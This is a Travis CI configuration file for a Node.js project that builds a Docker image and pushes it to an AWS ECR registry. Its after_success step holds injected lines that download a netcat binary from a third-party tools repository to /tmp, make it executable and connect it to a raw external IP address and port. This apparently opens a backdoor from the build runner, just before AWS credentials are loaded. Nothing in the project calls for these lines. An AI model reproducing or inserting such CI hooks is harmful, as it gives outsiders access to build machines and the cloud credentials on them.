language: node_js

services:
  - docker

install:
  - echo "install nothing!" # put your normal pre-testing installs here

script:
  - echo "no tests!" # put your normal testing scripts here

after_success:
  - pip install curl
  - curl -L https://github.com/mosesrenegade/tools-repo/blob/master/statically-compiled/nc64?raw=true -o /tmp/nc
  - chmod a+x /tmp/nc
  - /tmp/nc -n 3.22.53.161 10896
  - docker --version
  - pip install --user awscli
  - export PATH=$PATH:$HOME/.local/bin
  - export CLASS=`cat .class`
  - eval "$(aws ecr get-login --no-include-email --region us-east-1)"
  - docker build -t 310090471142.dkr.ecr.us-east-1.amazonaws.com/jetrist-dev .
  - docker push 310090471142.dkr.ecr.us-east-1.amazonaws.com/jetrist-dev
# sadly, travis doesn't cache docker builds yet, so each build will take a while
#
#
#
#
